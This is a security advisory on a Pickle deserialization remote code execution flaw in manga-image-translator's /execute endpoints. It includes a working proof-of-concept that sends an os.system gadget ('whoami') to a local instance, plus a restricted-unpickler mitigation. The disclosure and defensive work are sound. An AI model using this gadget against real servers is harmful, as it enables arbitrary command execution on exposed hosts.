### Key Information

#### Vulnerability Description

- **Type**: RCE (Remote Code Execution) due to insecure Pickle deserialization
- **Affected Project**: zyddnys/manga-image-translator
- **Affected Endpoints**:
  - `/execute/{method_name}`
  - `/simple_execute/{method_name}`

#### Reproduction Steps

- **Example Endpoint**: `/execute/{method_name}`
- **Run Command**:

```bash
docker run \
  --name manga_image_translator_cpu \
  -p 5003:5003 \
  -p 5004:5004 --ipc=host \
  --entrypoint python \
  --rm \
  -v /data1/projects/githubsrc/manga-image-translator/result:/app/result \
  -v /data1/projects/githubsrc/manga-image-translator/server/main.py:/app/server/main.py \
  -v /data1/projects/githubsrc/manga-image-translator/server/instance.py:/app/server/instance.py \
  -e OPENAI_API_KEY='' \
  -e OPENAI_API_BASE='' \
  -e OPENAI_MODEL='' \
  zyddnys/manga-image-translator:main \
  server/main.py --verbose --start-instance --host=0.0.0.0 --port=5003
```

- **POC Code**:

```python
import pickle
import os
import requests


class PickleRCE(object):
    # The unpickler calls the returned callable with the returned arguments,
    # so the command runs as soon as the server deserializes the body.
    def __reduce__(self):
        command = "whoami"
        return (os.system, (command,))


serialized_data = pickle.dumps(PickleRCE())

# The pickled body is sent directly to the execute endpoint of the instance.
url = "http://127.0.0.1:5004/execute/translate"
headers = {"Content-Type": "application/octet-stream"}
response = requests.post(
    url,
    headers=headers,
    data=serialized_data
)

print(f"Status Code: {response.status_code}")
print(f"Response Content: {response.text}")
```

#### Docker Logs

- **Error Message**: `INFO: 172.17.0.1:37888 - "POST /execute/translate HTTP/1.1" 500 Internal Server Error`

#### Impact

- **Impact**: RCE (Remote Code Execution)

#### Discoverer

- **Discoverer**: Tencent YunDing Security Lab
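As an added mitigation example (not the project's own code), the following restricted unpickler only reconstructs plain data types, so a `__reduce__` gadget of the shape used in the PoC above is refused in `find_class` before the referenced callable is ever resolved or invoked. The class and function names, the allowlist, and the request-like dict are assumptions and constructed sample data; they do not reflect what the project actually exchanges between its server and instance processes.

```python
import builtins
import io
import os
import pickle

# Assumed allowlist: only plain containers and scalars may be reconstructed
# from an untrusted stream. Any other global (os.system, subprocess.Popen,
# ...) is refused in find_class, which pickle consults before the referenced
# object is used, so the gadget never executes. The durable fix is to stop
# sending pickle over the network at all and use a schema-validated format.
ALLOWED_GLOBALS = {
    ("builtins", "dict"), ("builtins", "list"), ("builtins", "set"),
    ("builtins", "tuple"), ("builtins", "str"), ("builtins", "int"),
    ("builtins", "float"), ("builtins", "bool"), ("builtins", "bytes"),
}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"refused to load global {module}.{name}")


def safe_loads(data: bytes):
    """Deserialize data, allowing only the globals listed above."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


class PickleRCE:
    # Same gadget shape as the report's PoC; used here only to build sample
    # bytes that are never passed to the unrestricted pickle.loads.
    def __reduce__(self):
        return (os.system, ("whoami",))


def build_samples():
    """Constructed sample streams: a benign request-like dict and the gadget."""
    benign = pickle.dumps({"image": b"\x89PNG\r\n", "target_lang": "ENG"})
    gadget = pickle.dumps(PickleRCE())
    return benign, gadget


def classify(data: bytes) -> str:
    """Return 'ok' if the stream loads under the allowlist, else 'rejected'."""
    try:
        safe_loads(data)
        return "ok"
    except pickle.UnpicklingError:
        return "rejected"
```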